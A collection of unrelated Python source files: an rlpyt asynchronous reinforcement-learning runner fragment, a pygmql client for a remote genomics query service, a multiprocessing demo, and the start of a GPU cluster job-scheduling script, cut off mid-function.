def log_diagnostics(self, itr, sampler_itr, throttle_time, prefix='Diagnostics/'):
with logger.tabular_prefix(prefix):
logger.record_tabular('CumCompletedTrajs', self._cum_completed_trajs)
logger.record_tabular('NewCompletedTrajs', self._new_completed_trajs)
logger.record_tabular('StepsInTrajWindow',
sum(info["Length"] for info in self._traj_infos))
super().log_diagnostics(itr, sampler_itr, throttle_time, prefix=prefix)
self._new_completed_trajs = 0
class AsyncRlEval(AsyncRlBase):
"""
Asynchronous RL with offline agent performance evaluation.
"""
_eval = True
def initialize_logging(self):
self._traj_infos = list()
self._last_eval_time = 0.
super().initialize_logging()
self.pbar = ProgBarCounter(self.log_interval_itrs)
def log_diagnostics(self, itr, sampler_itr, throttle_time, prefix='Diagnostics/'):
if not self._traj_infos:
logger.log("WARNING: had no complete trajectories in eval.")
steps_in_eval = sum([info["Length"] for info in self._traj_infos])
with logger.tabular_prefix(prefix):
logger.record_tabular('StepsInEval', steps_in_eval)
logger.record_tabular('TrajsInEval', len(self._traj_infos))
logger.record_tabular('CumEvalTime', self.ctrl.eval_time.value)
super().log_diagnostics(itr, sampler_itr, throttle_time, prefix=prefix)
self._traj_infos = list() # Clear after each eval.
###############################################################################
# Worker processes.
###############################################################################
class AsyncOptWorker:
def __init__(
self,
rank,
world_size,
algo,
agent,
n_itr,
affinity,
seed,
ctrl,
port
):
save__init__args(locals())
def optimize(self):
self.startup()
itr = 0
while True:
self.ctrl.opt_throttle.wait()
if self.ctrl.quit_opt.value:
break
self.algo.optimize_agent(itr, sampler_itr=self.ctrl.sampler_itr.value) # Leave un-logged.
itr += 1
self.shutdown()
def startup(self):
torch.distributed.init_process_group(
backend="nccl",
rank=self.rank,
world_size=self.world_size,
init_method=f"tcp://127.0.0.1:{self.port}",
)
p = psutil.Process()
if self.affinity.get("set_affinity", True):
p.cpu_affinity(self.affinity["cpus"])
logger.log(f"Optimizer rank {self.rank} CPU affinity: {p.cpu_affinity()}.")
torch.set_num_threads(self.affinity["torch_threads"])
logger.log(f"Optimizer rank {self.rank} Torch threads: {torch.get_num_threads()}.")
logger.log(f"Optimizer rank {self.rank} CUDA index: "
f"{self.affinity.get('cuda_idx', None)}.")
set_seed(self.seed)
self.agent.to_device(cuda_idx=self.affinity.get("cuda_idx", None))
self.agent.data_parallel()
self.algo.optim_initialize(rank=self.rank)
def shutdown(self):
logger.log(f"Async optimization worker {self.rank} shutting down.")
def run_async_sampler(sampler, affinity, ctrl, traj_infos_queue, n_itr):
"""
Target function for the process which will run the sampler, in the case of
online performance logging. Toggles the sampler's double-buffer for each
iteration, waits for the memory copier to finish before writing into that
buffer, and signals the memory copier when the sampler is done writing a
minibatch.
"""
sampler.initialize(affinity)
db_idx = 0
for itr in range(n_itr):
ctrl.sample_copied[db_idx].acquire()
traj_infos = sampler.obtain_samples(itr, db_idx)
ctrl.sample_ready[db_idx].release()
with ctrl.sampler_itr.get_lock():
for traj_info in traj_infos:
traj_infos_queue.put(traj_info)
ctrl.sampler_itr.value = itr
db_idx ^= 1 # Double buffer.
logger.log(f"Async sampler reached final itr: {itr + 1}, quitting.")
ctrl.quit.value = True # This ends the experiment.
sampler.shutdown()
for s in ctrl.sample_ready:
s.release() # Let memcpy workers finish and quit.
def run_async_sampler_eval(sampler, affinity, ctrl, traj_infos_queue,
n_itr, eval_itrs):
"""
Target function running the sampler with offline performance evaluation.
"""
sampler.initialize(affinity)
db_idx = 0
for itr in range(n_itr + 1): # +1 to get last eval :)
ctrl.sample_copied[db_idx].acquire()
# assert not ctrl.sample_copied[db_idx].acquire(block=False) # Debug check.
sampler.obtain_samples(itr, db_idx)
ctrl.sample_ready[db_idx].release()
if itr % eval_itrs == 0:
eval_time = -time.time()
traj_infos = sampler.evaluate_agent(itr)
eval_time += time.time()
ctrl.eval_time.value += eval_time # Not atomic but only writer.
with ctrl.sampler_itr.get_lock():
for traj_info in traj_infos:
traj_infos_queue.put(traj_info)
traj_infos_queue.put(None) # Master will get until None sentinel.
ctrl.sampler_itr.value = itr
else:
ctrl.sampler_itr.value = itr
db_idx ^= 1 # Double buffer
logger.log(f"Async sampler reached final itr: {itr + 1}, quitting.")
ctrl.quit.value = True # This ends the experiment.
sampler.shutdown()
for s in ctrl.sample_ready:
s.release() # Let memcpy workers finish and quit.
def memory_copier(sample_buffer, samples_to_buffer, replay_buffer, ctrl):
"""
Target function for the process which will copy the sampler's minibatch buffer
into the algorithm's main replay buffer.
Args:
sample_buffer: The (single) minibatch buffer from the sampler, on shared memory.
samples_to_buffer: A function/method from the algorithm to process samples from the minibatch buffer into the replay buffer (e.g. select which fields, compute some prioritization).
replay_buffer: Algorithm's main replay buffer, on shared memory.
ctrl: Structure for communicating when the minibatch is ready to copy/done copying.
Warning:
Although this function may use the algorithm's ``samples_to_buffer()``
method, here it is running in a separate process, so will not be aware
of changes in the algorithm from the optimizer process. Furthermore,
it may not be able to store state across iterations--in the
implemented setup, two separate memory copier processes are used, so
each one only sees every other minibatch. (Could easily change to
single copier if desired, and probably without performance loss.)
"""
# Needed on some systems to avoid mysterious hang:
torch.set_num_threads(1)
# (Without torch.set_num_threads, experienced hang on Ubuntu Server 16.04
# machines (but not Desktop) when appending samples to make replay buffer
# full, but only for batch_B > 84 (dqn + r2d1 atari), regardless of replay
# size or batch_T. Would seem to progress through all code in
# replay.append_samples() but simply would not return from it. Some
# tipping point for MKL threading?)
while True:
ctrl.sample_ready.acquire()
# assert not ctrl.sample_ready.acquire(block=False) # Debug check.
if ctrl.quit.value:
break
replay_buffer.append_samples(samples_to_buffer(sample_buffer))
ctrl.sample_copied.release()
logger.log("Memory copier shutting down.")
def placeholder(x):
pass
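# Wiring sketch (my illustration; the sampler/algo/agent classes and the
# affinity helper live elsewhere in rlpyt and are not shown in this file). The
# ``affinity`` object only needs ``sampler`` and ``optimizer`` attributes, as
# described in the AsyncRlBase docstring:
#
#   runner = AsyncRl(algo=algo, agent=agent, sampler=sampler,
#                    n_steps=50e6, log_interval_steps=1e5,
#                    affinity=affinity, seed=42)
#   runner.train()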
|
RemoteManager.py
|
from . import default_address, headers
from ..managers import get_python_manager
from ..settings import is_progress_enabled
import requests, time, logging, json
from requests_toolbelt.multipart.encoder import MultipartEncoderMonitor, MultipartEncoder
import pandas as pd
from ..dataset.GDataframe import GDataframe
from ..dataset.parsers.RegionParser import RegionParser
from ..dataset.parsers import GTF
from ..dataset.DataStructures import chr_aliases, start_aliases, stop_aliases, strand_aliases
from ..dataset.loaders import Loader
from ..FileManagment import TempFileManager
import os, zipfile
from tqdm import tqdm
from ..dataset.storers.parserToXML import parserToXML
import warnings
import threading
import numpy as np
from ..dataset.loaders import FILES_FOLDER, SCHEMA_FILE
good_status = ['PENDING', 'RUNNING', 'DS_CREATION_RUNNING']
CHUNK_SIZE = 5 * 1024 * 1024 # 5 MB
class RemoteManager:
""" Manager of the user connection with the remote GMQL service
"""
def __init__(self, address=None, auth_token=None):
""" Instantiate a new RemoteManager. If no address is provided, the default address will
be used, which represents the current server hosted by the Dept. of Electronics, Information
and Bioengineering of Politecnico di Milano.
:param address: (optional) the address of the remote GMQL service
"""
# checking of the address
if address is None:
self.address = default_address
elif isinstance(address, str):
address = address.strip()
if address.endswith("/"):
self.address = address[:-1]
else:
self.address = address
else:
raise TypeError("The remote URL must be a string."
" {} was provided".format(type(address)))
# checking the existence of the remote service
req = requests.get(self.address + "/")
if req.status_code != 200:
raise ConnectionError("The server at {} is not responding".format(self.address))
self.logger = logging.getLogger()
# checking of the auth_token
if auth_token is not None:
header = self.__get_header(auth_token)
url = self.address + "/datasets"
response = requests.get(url, headers=header)
if response.status_code == 200:
# the auth_token is valid
# print("VALID AUTH TOKEN")
self.auth_token = auth_token
elif response.status_code == 401 and \
response.json().get("error") == 'UnAuthenticatedRequest':
# print("NOT-VALID AUTH TOKEN")
self.auth_token = None
else:
raise ValueError("Unknown state. {} ".format(response.status_code))
else:
self.auth_token = None
self.json_encoder = json.JSONEncoder()
"""
Security controls
"""
def register(self, first_name, last_name, user_name, email, password):
url = self.address + "/register"
body = {
"firstName" : first_name,
"lastName": last_name,
"username": user_name,
"email": email,
"password": password
}
response = requests.post(url, data=json.dumps(body))
if response.status_code != 200:
raise ValueError("Code {}. {}".format(response.status_code, response.json().get("error")))
def login(self, username=None, password=None):
""" Before doing any remote operation, the user has to login to the GMQL serivice.
This can be done in the two following ways:
* Guest mode: the user has no credentials and uses the system only as a temporary guest
* Authenticated mode: the user has credentials and a stable remote account
If neither username nor password is specified, the user enters the system as a guest.
If both are specified and they correspond to an existing user, the user enters as an
authenticated user.
:param username: (optional)
:param password: (optional)
:return: None
"""
if (username is None) and (password is None):
auth_token = self.__login_guest()
elif (username is not None) and (password is not None):
auth_token, fullName = self.__login_credentials(username, password)
self.logger.info("You are logged as {}".format(fullName))
else:
raise ValueError("you have to specify both username and password or nothing")
if auth_token is not None:
self.auth_token = auth_token
else:
raise ConnectionError("Impossible to retrieve the authentication token")
def auto_login(self, how="guest"):
if self.auth_token is None:
if how != 'guest':
warnings.warn("The authentication token for your account is expired. "
"You need to redo the login using the pygmql tool. "
"For now you will be logged as guest user")
self.auth_token = self.__login_guest()
return "guest"
else:
return how
def __login_guest(self):
url = self.address + "/guest"
response = requests.get(url=url, headers=headers)
response = response.json()
return response.get("authToken")
def __login_credentials(self, username, password):
url = self.address + "/login"
body = {
"username": username,
"password": password
}
# body = self.json_encoder.encode(body)
response = requests.post(url, data=json.dumps(body), headers=headers)
response = response.json()
errorString = response.get("errorString")
if errorString is not None:
raise ValueError(errorString)
else:
auth_token = response.get("authToken")
fullName = response.get("fullName")
return auth_token, fullName
@staticmethod
def __get_header(auth_token):
header = headers.copy()
header['X-AUTH-TOKEN'] = auth_token
return header
def __check_authentication(self):
if self.auth_token is not None:
return self.__get_header(self.auth_token)
else:
raise EnvironmentError("you first need to login before doing operations")
def logout(self):
""" Logout from the remote account
:return: None
"""
url = self.address + "/logout"
header = self.__check_authentication()
response = requests.get(url, headers=header)
if response.status_code != 200:
raise ValueError("Code {}. {}".format(response.status_code, response.json().get("error")))
"""
Repository
"""
@staticmethod
def process_info_list(res, info_column):
def extract_infos(row):
infoList = row['infoList']
result = {}
for d in infoList:
result[d['key']] = d['value']
return result
if info_column in res.columns:
res = pd.concat([res, pd.DataFrame.from_dict(res[info_column].map(extract_infos).tolist())], axis=1)\
.drop("info", axis=1)
return res
def get_dataset_list(self):
""" Returns the list of available datasets for the current user.
:return: a pandas Dataframe
"""
url = self.address + "/datasets"
header = self.__check_authentication()
response = requests.get(url, headers=header)
response = response.json()
datasets = response.get("datasets")
res = pd.DataFrame.from_dict(datasets)
return self.process_info_list(res, "info")
def get_dataset_samples(self, dataset_name, owner=None):
""" Get the list of samples of a specific remote dataset.
:param dataset_name: the dataset name
:param owner: (optional) who owns the dataset. If it is not specified, the current user
is used. For public datasets use 'public'.
:return: a pandas Dataframe
"""
if isinstance(owner, str):
owner = owner.lower()
dataset_name = owner + "." + dataset_name
header = self.__check_authentication()
url = self.address + "/datasets/" + dataset_name
response = requests.get(url, headers=header)
if response.status_code != 200:
raise ValueError("Code {}: {}".format(response.status_code, response.json().get("error")))
response = response.json()
samples = response.get("samples")
if len(samples) == 0:
return None
res = pd.DataFrame.from_dict(samples)
return self.process_info_list(res, "info")
def get_dataset_schema(self, dataset_name, owner=None):
""" Given a dataset name, it returns a BedParser coherent with the schema of it
:param dataset_name: a dataset name on the repository
:param owner: (optional) who owns the dataset. If it is not specified, the current user
is used. For public datasets use 'public'.
:return: a RegionParser
"""
if isinstance(owner, str):
owner = owner.lower()
dataset_name = owner + "." + dataset_name
url = self.address + "/datasets/" + dataset_name+"/schema"
header = self.__check_authentication()
response = requests.get(url, headers=header)
if response.status_code != 200:
raise ValueError("Code {}: {}".format(response.status_code, response.json().get("error")))
response = response.json()
name = response.get("name")
schemaType = response.get("type")
coordinates_system = response.get("coordinate_system")
fields = response.get("fields")
i = 0
chrPos, startPos, stopPos, strandPos = None, None, None, None
otherPos = []
if schemaType == GTF:
chrPos = 0 # seqname
startPos = 3 # start
stopPos = 4 # end
strandPos = 6 # strand
otherPos = [(1, 'source', 'string'), (2, 'feature', 'string'),
(5, 'score', 'float'), (7, 'frame', 'string')]
for field in fields:
fieldName = field.get("name")
fieldType = field.get("type").lower()
if fieldName.lower() not in {'seqname', 'start', 'end', 'strand',
'source', 'feature', 'score', 'frame'}:
otherPos.append((i, fieldName, fieldType))
i += 1
else:
for field in fields:
fieldName = field.get("name")
fieldType = field.get("type").lower()
if fieldName.lower() in chr_aliases and chrPos is None:
chrPos = i
elif fieldName.lower() in start_aliases and startPos is None:
startPos = i
elif fieldName.lower() in stop_aliases and stopPos is None:
stopPos = i
elif fieldName.lower() in strand_aliases and strandPos is None:
strandPos = i
else: # other positions
otherPos.append((i, fieldName, fieldType))
i += 1
if len(otherPos) == 0:
otherPos = None
return RegionParser(chrPos=chrPos,
startPos=startPos,
stopPos=stopPos,
strandPos=strandPos,
otherPos=otherPos,
schema_format=schemaType,
coordinate_system=coordinates_system,
delimiter="\t", parser_name=name)
def upload_dataset(self, dataset, dataset_name, schema_path=None):
""" Upload to the repository an entire dataset from a local path
:param dataset: the local path of the dataset or a GDataframe object
:param dataset_name: the name you want to assign to the dataset remotely
:param schema_path: (optional) the path of the schema file; if not provided, the one found in the dataset folder is used
:return: None
"""
url = self.address + "/datasets/" + dataset_name + "/uploadSample"
header = self.__check_authentication()
fields = dict()
remove = False
if isinstance(dataset, GDataframe):
tmp_path = TempFileManager.get_new_dataset_tmp_folder()
dataset.to_dataset_files(local_path=tmp_path)
dataset = tmp_path
remove = True
# a path is provided
if not isinstance(dataset, str):
raise TypeError("Dataset can be a path or a GDataframe. {} was passed".format(type(dataset)))
file_paths, schema_path_found = Loader.get_file_paths(dataset)
if schema_path is None:
schema_path = schema_path_found
fields['schema'] = (os.path.basename(schema_path), open(schema_path, "rb"), 'application/octet-stream')
for i, file in enumerate(file_paths):
fields["file"+str(i + 1)] = (os.path.basename(file), open(file, "rb"), 'application/octet-stream')
encoder = MultipartEncoder(fields)
callback = create_callback(encoder, len(fields))
m_encoder = MultipartEncoderMonitor(encoder, callback)
header['Content-Type'] = m_encoder.content_type
self.logger.debug("Uploading dataset at {} with name {}".format(dataset, dataset_name))
response = requests.post(url, data=m_encoder,
headers=header)
# closing files
for fn in fields.keys():
_, f, _ = fields[fn]
f.close()
if response.status_code != 200:
raise ValueError("Code {}: {}".format(response.status_code, response.content))
if remove:
TempFileManager.delete_tmp_dataset(dataset)
def delete_dataset(self, dataset_name):
""" Deletes the dataset having the specified name
:param dataset_name: the name that the dataset has on the repository
:return: None
"""
url = self.address + "/datasets/" + dataset_name
header = self.__check_authentication()
response = requests.delete(url, headers=header)
if response.status_code != 200:
raise ValueError("Code {}: {}".format(response.status_code, response.json().get("error")))
self.logger.debug("Dataset {} was deleted from the repository".format(dataset_name))
"""
Download repository
"""
def download_dataset(self, dataset_name, local_path, how="stream"):
""" It downloads from the repository the specified dataset and puts it
in the specified local folder
:param dataset_name: the name the dataset has in the repository
:param local_path: where you want to save the dataset
:param how: 'zip' downloads the whole dataset as a zip file and decompresses it; 'stream'
downloads the dataset sample by sample
:return: None
"""
if not os.path.isdir(local_path):
os.makedirs(local_path)
else:
raise ValueError("Path {} already exists!".format(local_path))
local_path = os.path.join(local_path, FILES_FOLDER)
os.makedirs(local_path)
if how == 'zip':
return self.download_as_zip(dataset_name, local_path)
elif how == 'stream':
return self.download_as_stream(dataset_name, local_path)
else:
raise ValueError("how must be {'zip', 'stream'}")
def download_as_zip(self, dataset_name, local_path):
header = self.__check_authentication()
url = self.address + "/datasets/" + dataset_name + "/zip"
self.logger.debug("Downloading dataset {} to {}".format(dataset_name, local_path))
response = requests.get(url, stream=True, headers=header)
if response.status_code != 200:
raise ValueError("Code {}: {}".format(response.status_code, response.json().get("error")))
tmp_zip = os.path.join(local_path, "tmp.zip")
f = open(tmp_zip, "wb")
total_size = int(response.headers.get("content-length", 0))
# TODO: find a better way to display the download progress
for chunk in tqdm(response.iter_content(chunk_size=CHUNK_SIZE), total=total_size/CHUNK_SIZE,
disable=not is_progress_enabled(), unit="B", unit_scale=True):
if chunk:
f.write(chunk)
f.close()
with zipfile.ZipFile(tmp_zip, "r") as zip_ref:
zip_ref.extractall(local_path)
os.remove(tmp_zip)
def download_as_stream(self, dataset_name, local_path):
N_THREADS = 10
def thread_download(sample_names):
for sn in sample_names:
self.download_sample(dataset_name=dataset_name,
sample_name=sn,
local_path=local_path,
how="all",
header=False)
pbar.update()
samples = self.get_dataset_samples(dataset_name)
if samples is not None:
threads = []
ids = samples.id.unique()
pbar = tqdm(total=len(ids), disable=not is_progress_enabled())
splits = np.array_split(ids, N_THREADS)
for ssn in splits:
names = samples[samples.id.isin(ssn)].name.values
t = threading.Thread(target=thread_download, args=(names, ))
t.start()
threads.append(t)
for t in threads:
t.join()
pbar.close()
schema = self.get_dataset_schema(dataset_name=dataset_name)
parserToXML(parser=schema, datasetName=dataset_name, path=os.path.join(local_path, SCHEMA_FILE))
def download_sample(self, dataset_name, sample_name, local_path, how="all", header=False):
header_get = self.__check_authentication()
url = self.address + "/datasets/{}/{}/{}?header={}"
region = False
meta = False
sample_path = os.path.join(local_path, sample_name + ".gdm")
region_path = sample_path
meta_path = sample_path + ".meta"
if how == 'regs':
region = True
elif how == 'meta':
meta = True
elif how == 'all':
region = True
meta = True
else:
raise ValueError("how must be {'regs', 'meta', 'all'}")
header = "true" if header else "false"
if region:
url_region = url.format(dataset_name, sample_name, "region", header)
response = requests.get(url_region, stream=True, headers=header_get)
with open(region_path, "wb") as f:
for data in response.iter_content(chunk_size=CHUNK_SIZE):
f.write(data)
if meta:
url_meta = url.format(dataset_name, sample_name, "metadata", header)
response = requests.get(url_meta, stream=True, headers=header_get)
with open(meta_path, "wb") as f:
for data in response.iter_content(chunk_size=CHUNK_SIZE):
f.write(data)
"""
Query
"""
def query(self, query, output_path=None, file_name="query", output="tab"):
""" Execute a GMQL textual query on the remote server.
:param query: the string containing the query
:param output_path: (optional) where to store the results locally. If specified,
the results are downloaded locally
:param file_name: (optional) the name of the query
:param output: (optional) how to save the results. It can be "tab" or "gtf"
:return: a pandas dataframe with the dictionary ids of the results
"""
header = self.__check_authentication()
header['Content-Type'] = "text/plain"
output = output.lower()
if output not in ['tab', 'gtf']:
raise ValueError("output must be 'tab' or 'gtf'")
url = self.address + "/queries/run/" + file_name + '/' + output
response = requests.post(url, data=query, headers=header)
if response.status_code != 200:
raise ValueError("Code {}. {}".format(response.status_code, response.json().get("error")))
response = response.json()
jobid = response.get("id")
self.logger.debug("JobId: {}. Waiting for the result".format(jobid))
status_resp = self._wait_for_result(jobid)
datasets = status_resp.get("datasets")
return self.__process_result_datasets(datasets, output_path)
def __process_result_datasets(self, datasets, output_path=None):
result = []
for dataset in datasets:
name = dataset.get("name")
if output_path is not None:
path = os.path.join(output_path, name)
self.download_dataset(dataset_name=name, local_path=path)
else:
path = None
result.append({'dataset': name, 'path': path})
return pd.DataFrame.from_dict(result)
def _wait_for_result(self, jobid):
count = 1
while True:
status_resp = self.trace_job(jobid)
status = status_resp["status"]
if status == 'SUCCESS':
break
elif status in good_status:
print("\r" + " "*50, end="")
dots = "." * (count % 4)
print("\r" + status + dots, end="")
else:
message = status_resp['message']
raise ValueError("Status: {}. Error during query execution: {}"
.format(status, message))
count += 1
time.sleep(1)
return status_resp
# def execute_remote(self, dataset, output="tab"):
# if not isinstance(dataset, GMQLDataset):
# raise TypeError("A GMQLDataset is required. {} was found".format(type(dataset)))
#
# dag = dataset._get_serialized_dag()
# self._execute_dag(dag, output)
# # TODO: complete...
def execute_remote_all(self, output="tab", output_path=None):
pmg = get_python_manager()
serialized_dag = pmg.get_serialized_materialization_list()
pmg.getServer().clearMaterializationList()
return self._execute_dag(serialized_dag, output, output_path)
def _execute_dag(self, serialized_dag, output="tab", output_path=None):
header = self.__check_authentication()
header['Content-Type'] = "text/plain"
output = output.lower()
if output not in ['tab', 'gtf']:
raise ValueError("output must be 'tab' or 'gtf'")
url = self.address + "/queries/dag/" + output
body = serialized_dag
response = requests.post(url=url, data=body, headers=header)
if response.status_code != 200:
raise ValueError("Code {}. {}".format(response.status_code, response.json().get("error")))
response = response.json()
jobid = response.get("id")
self.logger.debug("JobId: {}. Waiting for the result".format(jobid))
status_resp = self._wait_for_result(jobid)
datasets = status_resp.get("datasets")
if isinstance(output_path, bool):
if output_path:
output_path = TempFileManager.get_new_dataset_tmp_folder()
else:
output_path = None
return self.__process_result_datasets(datasets, output_path)
def get_memory_usage(self):
header = self.__check_authentication()
url = self.address + "/getMemoryUsage"
response = requests.get(url, headers=header)
if response.status_code != 200:
raise ValueError("Code {}. {}".format(response.status_code, response.json().get("error")))
response = response.json()
info_list = response.get("infoList")
index = []
values = []
for d in info_list:
key = d['key']
index.append(key)
value = d['value']
values.append(value)
return pd.Series(data=values, index=index)
"""
Execution
"""
def trace_job(self, jobId):
""" Get information about the specified remote job
:param jobId: the job identifier
:return: a dictionary with the information
"""
header = self.__check_authentication()
status_url = self.address + "/jobs/" + jobId + "/trace"
status_resp = requests.get(status_url, headers=header)
if status_resp.status_code != 200:
raise ValueError("Code {}. {}".format(status_resp.status_code, status_resp.json().get("error")))
return status_resp.json()
def create_callback(encoder, n_files=None):
encoder_len = encoder.len
if n_files is not None:
tot_len = n_files
byte_per_file = encoder_len / n_files
else:
tot_len = encoder_len
if is_progress_enabled():
bar = tqdm(total=tot_len)
if n_files is not None:
def callback(monitor):
bar.update(max(int((monitor.bytes_read / byte_per_file) - bar.n), 0))
return callback
def callback(monitor):
bar.update(monitor.bytes_read - bar.n)
return callback
else:
def callback(monitor):
pass
return callback
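# Illustrative wiring of create_callback (a sketch; assumes requests_toolbelt, which
# provides the MultipartEncoder whose .len and .bytes_read attributes are used above):
#   from requests_toolbelt import MultipartEncoder, MultipartEncoderMonitor
#   encoder = MultipartEncoder(fields={'file': ('data.zip', open('data.zip', 'rb'))})
#   monitor = MultipartEncoderMonitor(encoder, create_callback(encoder))
#   requests.post(url, data=monitor, headers={'Content-Type': monitor.content_type})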
|
print_process_info.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
from multiprocessing import Process
import os
def info(title):
print(title)
print('module name:', __name__)
print('parent process:', os.getppid())
print('process id:', os.getpid())
def f(name):
info('function f')
print('Hello,', name)
if __name__ == '__main__':
info('main line')
print()
p = Process(target=f, args=('bob',))
p.start()
p.join()
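# Expected output (illustrative; actual PIDs differ per run):
#   main line
#   module name: __main__
#   parent process: <shell pid>
#   process id: <script pid>
#
#   function f
#   module name: __main__   (shown as '__mp_main__' when the 'spawn' start method is used)
#   parent process: <script pid>
#   process id: <child pid>
#   Hello, bob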
|
main.py
|
import pdb
import time
import os
import subprocess
import re
import random
import json
import numpy as np
import glob
from tensorboard.backend.event_processing.event_accumulator import EventAccumulator
import socket
import argparse
import threading
import _thread
import signal
from datetime import datetime
import csv
from sklearn import neighbors
import gpu_pwr
parser = argparse.ArgumentParser(description='TCP client')
parser.add_argument('--tc', metavar='TESTCASE', type=str, help='select testcase')
args = parser.parse_args()
queue = [6, 33, 4, 43, 15, 47, 18, 42, 35, 40, 34, 20, 9, 29, 19, 22, 3, 5, 38, 7, 41, 39, 46, 17, 24, 28, 26, 45, 16, 14, 50, 48, 36, 27, 32, 8, 10, 49, 2, 12, 23, 1, 37, 31, 44, 21, 30, 11, 13, 25]
queue_dict = {}
arrival_time = 0
for item in queue:
arrival_time += np.random.poisson(30)
queue_dict[item] = arrival_time
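# Note: queue_dict maps job id -> cumulative arrival offset in seconds, so with
# Poisson(30) draws of e.g. 28 and 33 the first two queued jobs "arrive" roughly
# 28s and 61s after queue_timer is taken below (numbers are illustrative only).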
queue_timer = time.time()
job_start = {} #{'49': time1, '15': time2...}
# per-job bookkeeping, keyed by job id string
JCT = {str(item): 0 for item in queue}
completion = {str(item): 0 for item in queue}
overhead = {str(item): 0 for item in queue}  # every job starts with 0s overhead time
ovhd_start = {str(item): 0 for item in queue}
b_start = {str(item): 0 for item in queue}
c_start = {str(item): 0 for item in queue}
d_start = {str(item): 0 for item in queue}
ovhd_a = {str(item): [] for item in queue}  # e.g. {'1': [10, 12, ...], '2': [...]}
ovhd_b = {str(item): [] for item in queue}
ovhd_c = {str(item): [] for item in queue}
ovhd_d = {str(item): [] for item in queue}
ovhd_total = {str(item): [] for item in queue}
k80_1st = {str(item): [] for item in queue}
v100_1st = {str(item): [] for item in queue}
num_mig = {str(item): 0 for item in queue}  # number of migrations per job
queue_start = {str(item): 0 for item in queue}
queue_time = {str(item): 0 for item in queue}
V100_epoch_time = {str(item): 0 for item in queue}
K80_epoch_time = {str(item): 0 for item in queue}
K80_start_time = {str(item): 0 for item in queue}
V100_start_time = {str(item): 0 for item in queue}
promote_start_time = {str(item): 0 for item in queue}
demote_list = []
K80_time = {str(item): 0 for item in queue}
V100_time = {str(item): 0 for item in queue}
gpu_usage_time = []  # cluster-wide usage traces, appended once per scheduling interval (not per-job)
gpu_usage = []
gpu_usage_completion = []
speedup_dict = {str(item): 0 for item in queue}
predict_dict = {str(item): 0 for item in queue}
index = 0
all_jobs_started = False
K80_cap = 8
V100_cap = 4
K80_used = 0
V100_used = 0
K80_job = {str(i): 'idle' for i in range(K80_cap)}
V100_job = {str(i): 'idle' for i in range(V100_cap)}
qualified_job = []
step1_job = []
step2_job = []
pc_job = []
K80_node = 'c2180'
V100_node = 'd1024'
host_node = 'c0170'
testcase = args.tc
### also, change .h5 file folder in jobs ###
INTERVAL = 30 # make decision every 30s
######################### do a regression fit ########################
with open('x_data.json') as f:
x_train = json.load(f)
with open('y_data.json') as f:
y_train = json.load(f)
model = neighbors.KNeighborsRegressor(n_neighbors = 4, weights='distance')
model.fit(x_train, y_train)
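# The regressor is queried later as model.predict(np.array([x1, x2, x3]).reshape((1, -1)))[0] / 100,
# where (x1, x3) come from gpu_pwr.process_csv('job<id>'), x2 = 3600 / V100_epoch_time[job]
# (i.e. V100 epochs per hour), and the /100 presumably rescales a percentage prediction
# into the 0-1 speedup fraction stored in speedup_dict.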
####################################################################
def send_signal(node, cmd):
# Create a TCP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
port = 10000 if node == K80_node else 10001
# Connect the socket to the port where the server is listening
server_address = (node, int(port))
print('connecting to {} port {}'.format(*server_address))
sock.connect(server_address)
try:
# Send data
message = cmd.encode('utf-8') #b'save 35' #b'start 35 gpu 6'#b'save 35'
print('sending {!r}'.format(message))
sock.sendall(message)
while True:
data = sock.recv(32)
if 'success' in data.decode('utf-8'):
print('received {!r}'.format(data))
break
else:
print('waiting for success signal')
time.sleep(1)
finally:
#print('closing socket')
sock.close()
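# Example (matching the command formats used below): send_signal(K80_node, 'save 35 pid 10000')
# blocks until the receiving node's daemon replies with a message containing 'success'.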
def max_speedup_promotion(K80_free, V100_free, V100_job, promote_list, demote_list, force_demote):
num_demote = len(force_demote)
num_promote = len(promote_list)
V100_vacant = num_demote + V100_free
K80_vacant = num_promote + K80_free
global speedup_dict
if K80_vacant >= num_demote: # if more vacant K80s than demote jobs, always force demote
# selectively promote among active V100 jobs and promote list jobs
V100_qual = demote_list
#if 'idle' in V100_qual:
# V100_qual.remove('idle')
V100_pool = list(set(V100_qual).union(promote_list))
if num_promote <= V100_vacant: # promote all jobs as well
return promote_list, force_demote
else: # keep only the highest-speedup jobs on the V100s
pool_dict = {}
V100_avail = V100_vacant + len(V100_qual)
for job in V100_pool:
if job in speedup_dict:
pool_dict[job] = speedup_dict[job]
sorted_pool = sorted(pool_dict, key=pool_dict.get, reverse=True)[:V100_avail]
promotion_list = list(set(promote_list).intersection(sorted_pool))
demotion_list = list(set(demote_list).difference(sorted_pool))
if 'idle' in demotion_list:
demotion_list.remove('idle') # this includes force demotion
# lazy migration: for every V100 job slated for demotion (from high speedup to low), compare
# it with the K80 jobs slated for promotion (from low speedup to high); if their speedup
# difference is within 0.05, cancel that promotion/demotion pair.
for job_demote in sorted(pool_dict, key=pool_dict.get, reverse=True):
if job_demote in demotion_list:
for job_promote in sorted(pool_dict, key=pool_dict.get, reverse=False):
if job_promote in promotion_list:
if speedup_dict[job_promote] - speedup_dict[job_demote] < 0.05:
demotion_list.remove(job_demote)
promotion_list.remove(job_promote)
break
return promotion_list, demotion_list
# situations below won't happen
elif V100_vacant >= num_promote: # if more vacant V100s than promote jobs, always promote
# less vacant K80s than demote jobs, select worst among force demote list
pool_dict = {} # here the pool only includes force demote jobs
for job in force_demote:
if job in speedup_dict:
pool_dict[job] = speedup_dict[job]
sorted_pool = sorted(pool_dict, key=pool_dict.get, reverse=False)[:K80_vacant]
if len(sorted_pool) > 0:
raise ValueError("Bug: demotion shouldn't happen because no job is practically complete")
return promote_list, sorted_pool
else:
raise ValueError('Bug with max speedup promotion, condition not considered')
def min_speedup_demotion(K80_job, demote_list):
num_demote = len(demote_list)
global speedup_dict
# selectively demote among active K80 jobs and demote list jobs
K80_qual = list(set(list(K80_job.values())))
if 'idle' in K80_qual:
K80_qual.remove('idle')
K80_pool = list(set(K80_qual).union(demote_list))
if len(K80_pool) <= 8: # demote all jobs, no promotion
return [], demote_list[:] # must return a copy, otherwise the output points to the same address as input
else: # keep only the 8 lowest-speedup jobs on the K80s and promote the rest
pool_dict = {}
for job in K80_pool:
if job in speedup_dict:
pool_dict[job] = speedup_dict[job]
sorted_pool = sorted(pool_dict, key=pool_dict.get, reverse=False)[:8] # 8 least speedup jobs
demotion_list = list(set(demote_list).intersection(sorted_pool))
promotion_list = list(set(list(K80_job.values())).difference(sorted_pool))
if 'idle' in promotion_list:
